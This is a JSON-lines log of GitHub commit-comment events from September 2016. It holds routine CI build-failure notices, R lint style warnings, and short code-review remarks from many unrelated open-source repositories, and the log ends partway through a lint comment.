{"id":"4568365635","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19037062,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T14:16:39Z","updated_at":"2016-09-15T14:16:39Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T14:16:39Z"}
{"id":"4568366013","type":"CommitCommentEvent","actor":{"login":"CriztianiX"},"repo":{"name":"CriztianiX/sailor"},"payload":{"comment":{"id":19037063,"position":null,"line":null,"path":null,"commit_id":"944fba4c7e0dea08c5125cc50b5a95588d29bb3c","created_at":"2016-09-15T14:16:43Z","updated_at":"2016-09-15T14:16:43Z","body":"Connections are implicitly closed when a script has finished executing. The only reason you may want to close a connection is if you plan on opening another one.\r\nWhat do you think?"}},"created_at":"2016-09-15T14:16:43Z"}
{"id":"4568367194","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19037067,"position":null,"line":null,"path":null,"commit_id":"8f95d8f4d4c7e5afa99896a95dc417eae1e0188f","created_at":"2016-09-15T14:16:53Z","updated_at":"2016-09-15T14:16:53Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/466/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T14:16:53Z"}
{"id":"4568368164","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19037070,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T14:17:01Z","updated_at":"2016-09-15T14:17:01Z","body":"Probabilities allows to compute metrics other than AUC (like logloss), also for multiclass classification  probabilities gives much more information than just prediction. Spark's GBT doesn't provide such information that's why it would be great to use xgboost for this. For regression it's just better to extends [Regressor](https://github.com/apache/spark/blob/master/mllib/src/main/scala/org/apache/spark/ml/regression/Regressor.scala)"}},"created_at":"2016-09-15T14:17:01Z"}
{"id":"4568368517","type":"CommitCommentEvent","actor":{"login":"jacklam718"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19037074,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-15T14:17:06Z","updated_at":"2016-09-15T14:17:06Z","body":"I remove the padding, because that make the dialog also had 10 padding.\r\n![screen shot 2016-09-15 at 10 17 49 pm](https://cloud.githubusercontent.com/assets/5494638/18553190/1d2f2714-7b92-11e6-990b-75b71ca20519.png)\r\n\r\n\r\n"}},"created_at":"2016-09-15T14:17:06Z"}
{"id":"4568372561","type":"CommitCommentEvent","actor":{"login":"iamvery"},"repo":{"name":"iamvery/phoenix"},"payload":{"comment":{"id":19037086,"position":5,"line":438,"path":"lib/phoenix/endpoint.ex","commit_id":"045963d6fc96f92351950852b1d775922c07d872","created_at":"2016-09-15T14:17:44Z","updated_at":"2016-09-15T14:17:44Z","body":"Minor note: this would also `import Plug.Conn` which may or may not be desirable. If undesirable, we can `import Plug.Conn, only: []`"}},"created_at":"2016-09-15T14:17:44Z"}
{"id":"4568375815","type":"CommitCommentEvent","actor":{"login":"silverkorn"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19037096,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T14:18:15Z","updated_at":"2016-09-15T14:18:15Z","body":"Is it strictly for 2D games?"}},"created_at":"2016-09-15T14:18:15Z"}
{"id":"4568376226","type":"CommitCommentEvent","actor":{"login":"xyklex"},"repo":{"name":"dkrimmer84/l10n_co_point_of_sale"},"payload":{"comment":{"id":19037099,"position":null,"line":null,"path":null,"commit_id":"4a08da29f334c0c6e814bad064fd0d98babc8c13","created_at":"2016-09-15T14:18:19Z","updated_at":"2016-09-15T14:18:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;EOU2zMao&#x2F;250-bug-pos-error-cuando-uno-valida-un-ticket-sin-cliente\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: POS - Error cuando uno valida un ticket sin cliente</a>"}},"created_at":"2016-09-15T14:18:19Z"}
{"id":"4568376255","type":"CommitCommentEvent","actor":{"login":"j-moeller"},"repo":{"name":"j-moeller/vindue"},"payload":{"comment":{"id":19037100,"position":12,"line":150,"path":"src/node/node.component.ts","commit_id":"da99229a00ac73d30ff29094af937448d0dd7402","created_at":"2016-09-15T14:18:19Z","updated_at":"2016-09-15T14:18:19Z","body":"Fixes #1"}},"created_at":"2016-09-15T14:18:19Z"}
{"id":"4568376375","type":"CommitCommentEvent","actor":{"login":"koretskyi"},"repo":{"name":"koretskyi/111"},"payload":{"comment":{"id":19037101,"position":null,"line":null,"path":null,"commit_id":"d5ac0186f769216b998e3078e99527fa9e6be317","created_at":"2016-09-15T14:18:20Z","updated_at":"2016-09-15T14:18:20Z","body":"\r\n\r\n\r\n\r\n\r\n[1.txt](https://github.com/koretskyi/111/files/474848/1.txt)\r\n"}},"created_at":"2016-09-15T14:18:20Z"}
{"id":"4568376503","type":"CommitCommentEvent","actor":{"login":"joshbuchea"},"repo":{"name":"joshbuchea/HEAD"},"payload":{"comment":{"id":19037102,"position":null,"line":null,"path":null,"commit_id":"4cd6e5ce9b80dd1b12afadcfbee5f046afeedca7","created_at":"2016-09-15T14:18:21Z","updated_at":"2016-09-15T14:18:21Z","body":"Haha go me 🎉 Yeah that was an accident. @scottaohara I respect your opinion on opening links in new tabs, and I agree for internal links. However, personally, I prefer all external links to open in a new tab. Can't stand it when I assume a link will be opened in a new tab/window and instead it hijacks my tab/window and potentially loses the state of the page/app."}},"created_at":"2016-09-15T14:18:21Z"}
{"id":"4568377774","type":"CommitCommentEvent","actor":{"login":"vyper1788"},"repo":{"name":"vyper1788/InfoEtTecno_YannickHamelin"},"payload":{"comment":{"id":19037109,"position":null,"line":null,"path":null,"commit_id":"2d6cf1fa62ca6f2c1664a1a76d69ac36392325a2","created_at":"2016-09-15T14:18:33Z","updated_at":"2016-09-15T14:18:33Z","body":"Contenu modifié"}},"created_at":"2016-09-15T14:18:33Z"}
{"id":"4568379198","type":"CommitCommentEvent","actor":{"login":"koretskyi"},"repo":{"name":"koretskyi/111"},"payload":{"comment":{"id":19037114,"position":null,"line":null,"path":null,"commit_id":"d5ac0186f769216b998e3078e99527fa9e6be317","created_at":"2016-09-15T14:18:45Z","updated_at":"2016-09-15T14:18:45Z","body":"Test case on SIDE"}},"created_at":"2016-09-15T14:18:45Z"}
{"id":"4568380947","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037123,"position":6,"line":137,"path":"Timelapse2/Timelapse/Constants.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:19:02Z","updated_at":"2016-09-15T14:19:02Z","body":"Avoid unnecessary proliferation of types.  This is fine in the Controls class."}},"created_at":"2016-09-15T14:19:02Z"}
{"id":"4568382281","type":"CommitCommentEvent","actor":{"login":"labkey-teamcity"},"repo":{"name":"LabKey/cds"},"payload":{"comment":{"id":19037134,"position":null,"line":null,"path":null,"commit_id":"909d0979ffa6e8f59f964da057727211b163b1d0","created_at":"2016-09-15T14:19:18Z","updated_at":"2016-09-15T14:19:18Z","body":"TeamCity LabKey :: LabkeyModules15.2 :: CDS postgres 9.4 [Build 69](https://teamcity.labkey.org/viewLog.html?buildId=362526&buildTypeId=LabkeyModules152_CdsPostgres93) outcome was **FAILURE**\nSummary: Tests failed: 4 (2 new), passed: 21 Build time: 00:41:59\n### Failed tests\n```\norg.labkey.test.tests.CDSTest.verifyGrid: <no details avaliable>\n\norg.labkey.test.tests.CDSVisualizationTest.verifyBinnedPlot: <no details avaliable>\n\norg.labkey.test.tests.CDSTest.verifyHomePage: <no details avaliable>\n\norg.labkey.test.tests.CDSVisualizationTest.verifyBoxPlots: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-15T14:19:18Z"}
{"id":"4568385945","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037147,"position":7,"line":49,"path":"Timelapse2/Timelapse/Controls/DataEntryChoice.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:19:50Z","updated_at":"2016-09-15T14:19:50Z","body":"Prefer robust code.  Consider String.Empty() to avoid a null ref."}},"created_at":"2016-09-15T14:19:50Z"}
{"id":"4568387246","type":"CommitCommentEvent","actor":{"login":"cjo20"},"repo":{"name":"EnhancedRadioDevices/915MHzEdisonExplorer_SW"},"payload":{"comment":{"id":19037149,"position":null,"line":null,"path":null,"commit_id":"b9cf72c1f886a6e96ff73a684ed051128b70e703","created_at":"2016-09-15T14:20:03Z","updated_at":"2016-09-15T14:20:03Z","body":"This looks to have incorrect indentation in lines 56 and 57."}},"created_at":"2016-09-15T14:20:03Z"}
{"id":"4568391227","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037155,"position":10,"line":52,"path":"Timelapse2/Timelapse/Controls/DataEntryChoice.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:20:44Z","updated_at":"2016-09-15T14:20:44Z","body":"Prefer consistency.  Place display values in Constants alongside database values.\r\n\r\nAvoid magic constants."}},"created_at":"2016-09-15T14:20:44Z"}
{"id":"4568394588","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037163,"position":13,"line":20,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/DialogEditChoiceList.xaml.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:21:17Z","updated_at":"2016-09-15T14:21:17Z","body":"Why?"}},"created_at":"2016-09-15T14:21:17Z"}
{"id":"4568399812","type":"CommitCommentEvent","actor":{"login":"Rylock"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19037178,"position":null,"line":null,"path":null,"commit_id":"04a93d357a9590147b4343fbb6db11f1e0fffa20","created_at":"2016-09-15T14:22:05Z","updated_at":"2016-09-15T14:22:05Z","body":"Should the MiniSWMH disease file be moved as well?"}},"created_at":"2016-09-15T14:22:05Z"}
{"id":"4568401029","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037186,"position":18,"line":25,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/DialogEditChoiceList.xaml.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:22:19Z","updated_at":"2016-09-15T14:22:19Z","body":"Prefer robust code.  Use Contains() or include a comment explaining why only the last value is subject to replacement."}},"created_at":"2016-09-15T14:22:19Z"}
{"id":"4568402826","type":"CommitCommentEvent","actor":{"login":"gnzlbg"},"repo":{"name":"ericniebler/range-v3"},"payload":{"comment":{"id":19037194,"position":33,"line":307,"path":"include/range/v3/detail/config.hpp","commit_id":"4cfcb59c3db1c279d72c64ccf15de3c724a0362d","created_at":"2016-09-15T14:22:35Z","updated_at":"2016-09-15T14:22:35Z","body":"I've filled an issue #472 .\r\n\r\nFYI `static_const` is not deprecated. It is still included with the library utilities, and users should still be able to get it and use it."}},"created_at":"2016-09-15T14:22:35Z"}
{"id":"4568407289","type":"CommitCommentEvent","actor":{"login":"scottleibrand"},"repo":{"name":"EnhancedRadioDevices/915MHzEdisonExplorer_SW"},"payload":{"comment":{"id":19037203,"position":null,"line":null,"path":null,"commit_id":"b9cf72c1f886a6e96ff73a684ed051128b70e703","created_at":"2016-09-15T14:23:19Z","updated_at":"2016-09-15T14:23:19Z","body":"It has tabs instead of spaces. (I fixed it on my branch before commenting it out for compatibility with mmeowlink.)"}},"created_at":"2016-09-15T14:23:19Z"}
{"id":"4568408816","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037207,"position":13,"line":51,"path":"python/lsst/pipe/tasks/matchBackgrounds.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:23:32Z","updated_at":"2016-09-15T14:23:32Z","body":"I think you can drop the `list` and the `.keys()` here."}},"created_at":"2016-09-15T14:23:32Z"}
{"id":"4568409984","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/address-bloc2"},"payload":{"comment":{"id":19037210,"position":16,"line":16,"path":"models/address_book.rb","commit_id":"e46ca98534d5de6f17d348a9955221e2f9546293","created_at":"2016-09-15T14:23:43Z","updated_at":"2016-09-15T14:23:43Z","body":"not sure what you're saying here...do you not understand loops yet?"}},"created_at":"2016-09-15T14:23:43Z"}
{"id":"4568412088","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19037218,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T14:24:05Z","updated_at":"2016-09-15T14:24:05Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T14:24:05Z"}
{"id":"4568412267","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19037220,"position":null,"line":null,"path":null,"commit_id":"36ea8f4e6a4cd8c2512f54a034aa3ac9864b28c8","created_at":"2016-09-15T14:24:07Z","updated_at":"2016-09-15T14:24:07Z","body":"Ubuntu Chrome 53 I'd say otherwise. "}},"created_at":"2016-09-15T14:24:07Z"}
{"id":"4568413121","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/address-bloc2"},"payload":{"comment":{"id":19037223,"position":25,"line":25,"path":"models/address_book.rb","commit_id":"e46ca98534d5de6f17d348a9955221e2f9546293","created_at":"2016-09-15T14:24:16Z","updated_at":"2016-09-15T14:24:16Z","body":"overall this method can be a lot less convoluted...try another way of doing this. think simple :)"}},"created_at":"2016-09-15T14:24:16Z"}
{"id":"4568413186","type":"CommitCommentEvent","actor":{"login":"IceN9ne"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19037224,"position":null,"line":null,"path":null,"commit_id":"eba87768bc7394b5dc5d62c5e6274fae53039ab8","created_at":"2016-09-15T14:24:16Z","updated_at":"2016-09-15T14:24:16Z","body":"That's because 'c' only works in Channel/Query windows, as far as I can tell."}},"created_at":"2016-09-15T14:24:16Z"}
{"id":"4568415363","type":"CommitCommentEvent","actor":{"login":"jeremyboggs"},"repo":{"name":"scholarslab/TakebackCustomizations"},"payload":{"comment":{"id":19037229,"position":null,"line":null,"path":null,"commit_id":"683ac38590ab63f484a82be1508c1c7a8dc0bbcf","created_at":"2016-09-15T14:24:36Z","updated_at":"2016-09-15T14:24:36Z","body":"Note that this doesn't make the tags private. It just prevents them from being displayed in any tag list or tag cloud on the public side. Users could still use the advanced search and query by tag for these tags, and get results. If we ever need to actually keep tags private, we should probably develop a separate plugin specifically for that purpose."}},"created_at":"2016-09-15T14:24:36Z"}
{"id":"4568416028","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037232,"position":13,"line":51,"path":"python/lsst/pipe/tasks/matchBackgrounds.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:24:42Z","updated_at":"2016-09-15T14:24:42Z","body":"Yup"}},"created_at":"2016-09-15T14:24:42Z"}
{"id":"4568416044","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/address-bloc2"},"payload":{"comment":{"id":19037233,"position":39,"line":39,"path":"spec/address_book_spec.rb","commit_id":"e46ca98534d5de6f17d348a9955221e2f9546293","created_at":"2016-09-15T14:24:42Z","updated_at":"2016-09-15T14:24:42Z","body":"do you understand what ll of these tests are doing?"}},"created_at":"2016-09-15T14:24:42Z"}
{"id":"4568417854","type":"CommitCommentEvent","actor":{"login":"tatobari"},"repo":{"name":"tatobari/hx711py"},"payload":{"comment":{"id":19037236,"position":null,"line":null,"path":null,"commit_id":"0f1ca0beef541063f663d17b89277482157724d9","created_at":"2016-09-15T14:24:59Z","updated_at":"2016-09-15T14:24:59Z","body":"Hi!\r\nYou should probably open a \"issue\" with your problem. Did you check \"example.py\"? My best guess is that you need to change the parameters of the method `set_reading_format(\"LSB\", \"MSB\")` to `set_reading_format(\"MSB\", \"MSB\")`.\r\n\r\nRegards,\r\nTato"}},"created_at":"2016-09-15T14:24:59Z"}
{"id":"4568418717","type":"CommitCommentEvent","actor":{"login":"michaelstephendavies"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19037238,"position":5,"line":61,"path":"Mage.Sets/src/mage/sets/kaladesh/WispweaverAngel.java","commit_id":"0042dc1ad98a62378ae463a96a325cad6718a44f","created_at":"2016-09-15T14:25:09Z","updated_at":"2016-09-15T14:25:09Z","body":"taget?"}},"created_at":"2016-09-15T14:25:09Z"}
{"id":"4568419008","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":19037239,"position":4,"line":25,"path":"common/CMakeLists.txt","commit_id":"bcac4fedd544b666874c05d7189acbac39809fb6","created_at":"2016-09-15T14:25:12Z","updated_at":"2016-09-15T14:25:12Z","body":"We should use `qt4_wrap_cpp` rather, but I do not remember why."}},"created_at":"2016-09-15T14:25:12Z"}
{"id":"4568421067","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/address-bloc2"},"payload":{"comment":{"id":19037246,"position":46,"line":46,"path":"spec/entry_spec.rb","commit_id":"e46ca98534d5de6f17d348a9955221e2f9546293","created_at":"2016-09-15T14:25:30Z","updated_at":"2016-09-15T14:25:30Z","body":"can you tell me what different is respond and report?"}},"created_at":"2016-09-15T14:25:30Z"}
{"id":"4568423423","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037251,"position":69,"line":364,"path":"python/lsst/pipe/tasks/mocks/simpleMapper.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:25:51Z","updated_at":"2016-09-15T14:25:51Z","body":"```python\r\npatchX, patchY = (int(c) for c in dataId['patch'].split(','))\r\n```\r\n?"}},"created_at":"2016-09-15T14:25:51Z"}
{"id":"4568425105","type":"CommitCommentEvent","actor":{"login":"grisaitis"},"repo":{"name":"TuragaLab/PyGreentea"},"payload":{"comment":{"id":19037255,"position":4,"line":66,"path":"data_io/dataset_reading.py","commit_id":"50be17ebcbee787ac87555fcb25db6aa8a52d2e9","created_at":"2016-09-15T14:26:09Z","updated_at":"2016-09-15T14:26:09Z","body":"Hey Jan, could you explain why you move this mask_array definition up a few lines of code?"}},"created_at":"2016-09-15T14:26:09Z"}
{"id":"4568426503","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19037259,"position":null,"line":null,"path":null,"commit_id":"cd3eeb57359eb7ee211077b3d3ec7172fd950b41","created_at":"2016-09-15T14:26:23Z","updated_at":"2016-09-15T14:26:23Z","body":"[R/ABC_SMC.R:25:15:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/R/ABC_SMC.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​      vals[i] = vals[i] * stats::dnorm(diff, mean = 0, sd = sigma)\n              ^\n```\n[tests/testthat/test_abc_smc_nltt.R:36:26:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                        ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:36:33:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                ^\n```\n[tests/testthat/test_abc_smc_nltt.R:36:41:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                       ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:36:46:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                             ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:12:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n           ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:20:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n                   ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:31:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n                              ^\n```\n[tests/testthat/test_abc_smc_nltt.R:51:1:](https://github.com/richelbilderbeek/nLTT/blob/cd3eeb57359eb7ee211077b3d3ec7172fd950b41/tests/testthat/test_abc_smc_nltt.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2016-09-15T14:26:23Z"}
{"id":"4568426562","type":"CommitCommentEvent","actor":{"login":"seav"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19037260,"position":12,"line":2121,"path":"cadasta/config/locale/pt/LC_MESSAGES/django.po","commit_id":"3a7283c87a7ba6434c53d25f8f0e5f37d6b84f2a","created_at":"2016-09-15T14:26:23Z","updated_at":"2016-09-15T14:26:23Z","body":"Shouldn't this other `</ div>` be fixed as well?"}},"created_at":"2016-09-15T14:26:23Z"}
{"id":"4568431487","type":"CommitCommentEvent","actor":{"login":"volzhs"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19037271,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T14:27:07Z","updated_at":"2016-09-15T14:27:07Z","body":"@silverkorn I guess so"}},"created_at":"2016-09-15T14:27:07Z"}
{"id":"4568432152","type":"CommitCommentEvent","actor":{"login":"ian-ross"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19037274,"position":12,"line":2121,"path":"cadasta/config/locale/pt/LC_MESSAGES/django.po","commit_id":"3a7283c87a7ba6434c53d25f8f0e5f37d6b84f2a","created_at":"2016-09-15T14:27:15Z","updated_at":"2016-09-15T14:27:15Z","body":"Probably, yes!  Let me have a proper look for other bad tags."}},"created_at":"2016-09-15T14:27:15Z"}
{"id":"4568432372","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":19037276,"position":null,"line":null,"path":null,"commit_id":"9ebb502d67af656fbd72f1aef17c5810d20e0f6b","created_at":"2016-09-15T14:27:17Z","updated_at":"2016-09-15T14:27:17Z","body":"Anime de Wakaru Shinryounaika\r\nBlade & Soul\r\nBlade & Soul Special till Ep5\r\nBuddy Complex\r\nBuddy Complex: Kanketsu-hen - Ano Sora ni Kaeru Mirai de\r\nCandy Boy: Nonchalant Talk of the Certain Twin Sisters in Daily Life\r\nEve no Jikan\r\nEve no Jikan (Movie)\r\nFutakoi\r\nFutakoi Alternative"}},"created_at":"2016-09-15T14:27:17Z"}
{"id":"4568432477","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037277,"position":22,"line":29,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/DialogEditChoiceList.xaml.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:27:18Z","updated_at":"2016-09-15T14:27:18Z","body":"Prefer encapsulation and clear ownership.  Why isn't Utilties.ConvertBarsToLineBreaks() responsible for this?"}},"created_at":"2016-09-15T14:27:18Z"}
{"id":"4568433260","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037281,"position":18,"line":187,"path":"tests/testProcessCcd.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:27:25Z","updated_at":"2016-09-15T14:27:25Z","body":"Can you fix this `lambda` usage whilst we are here? `def fixNan(x)` is the version required by the style guide."}},"created_at":"2016-09-15T14:27:25Z"}
{"id":"4568438354","type":"CommitCommentEvent","actor":{"login":"reagentoo"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":19037293,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-15T14:28:12Z","updated_at":"2016-09-15T14:28:12Z","body":"Ok. Another question. Why does the QMPlay2 uses directly libgme.so (libChiptune.so module)? ffmpeg can builds with game-music-emu library and can work with libgme.so."}},"created_at":"2016-09-15T14:28:12Z"}
{"id":"4568439721","type":"CommitCommentEvent","actor":{"login":"bramtenhove"},"repo":{"name":"goalgorilla/drupal_social"},"payload":{"comment":{"id":19037301,"position":null,"line":null,"path":null,"commit_id":"bc3065d6734c08e6a8f9cd881720994ab204e411","created_at":"2016-09-15T14:28:25Z","updated_at":"2016-09-15T14:28:25Z","body":"Hi @NielsGG, I just noticed you missed removing `memory_limit 1024M` at the top of the php.ini file."}},"created_at":"2016-09-15T14:28:25Z"}
{"id":"4568439801","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19037302,"position":null,"line":null,"path":null,"commit_id":"564c9931afef88e05aa63681d80b431a5df4c4e2","created_at":"2016-09-15T14:28:25Z","updated_at":"2016-09-15T14:28:25Z","body":"[R/ABC_SMC.R:25:15:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/R/ABC_SMC.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​      vals[i] = vals[i] * stats::dnorm(diff, mean = 0, sd = sigma)\n              ^\n```\n[tests/testthat/test_abc_smc_nltt.R:36:26:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                        ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:36:33:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                ^\n```\n[tests/testthat/test_abc_smc_nltt.R:36:41:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                       